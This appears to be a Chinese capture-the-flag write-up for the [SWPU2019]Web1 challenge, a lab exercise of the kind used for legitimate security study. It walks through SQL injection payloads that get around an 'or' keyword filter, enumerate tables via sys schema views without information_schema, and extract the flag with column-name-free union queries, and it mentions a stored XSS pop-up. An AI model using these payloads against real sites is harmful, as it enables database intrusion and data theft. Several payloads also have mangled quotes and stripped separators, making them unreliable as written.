考点
无informat_schema注入:https://www.anquanke.com/post/id/193512
无列名注入:https://nosec.org/home/detail/2245.html
看到申请发布广告盲猜xss
![无列名注入+or的bypass([SWPU2019]Web1) - 图1](/uploads/projects/u390550@fftlfh/ab3146ff2b7df2d299696f463f40ad16.png)
成功弹窗xss,但是点击广告详情发现SQL错误
![无列名注入+or的bypass([SWPU2019]Web1) - 图2](/uploads/projects/u390550@fftlfh/2eab9a9abf898569a6cd649faf507212.png)
fuzz发现只要有or均反馈标题含有敏感词汇
1’ order by 5#
1’/‘/order/‘/by/‘/5#
1’/‘/ororderder/‘/bbyy/‘/5#
这样不行就尝试联合查询判断列数,单引号是为了闭合
1’/‘/union/‘/select/‘/1,2,3’%23
1’/‘/union/‘/select/‘/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22’%23
查数据库
1’/‘/union/‘/select/‘/1,database(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22’%23
![无列名注入+or的bypass([SWPU2019]Web1) - 图3](/uploads/projects/u390550@fftlfh/38ff46e6a4ba71ce2690258a888be3a2.png)
查表
1’union//select//1,
(select//group_concat(table_name)//from/**/sys.schema_auto_increment_colum
ns//where//table_schema=schema()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
,19,20,21,22’%23
得到ads,user表
查字段
无列名注入,本地尝试,因为数据有八列,固联合查询八列
1’union//select//1,
(select/‘/4/‘/from/‘/(select/‘/1,2,3,4,5,6/‘/union/‘/select/‘//‘/from/‘*/users)redforce),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22’
反馈标题含有敏感词汇,猜测过滤了反单引号
第二个字段
-1’union//select//1,(select//group_concat(a)//from(select//1,2//as//a,3//union//select*from//users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,’22
flag
-1’union//select//1,(select//group_concat(b)//from(select//1,2,3//as//b//union//select*from//users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,’22
![无列名注入+or的bypass([SWPU2019]Web1) - 图4](/uploads/projects/u390550@fftlfh/b4f1dc77a6f3fb05dcb884934b593a00.png)
若有收获,就点个赞吧
0 人点赞
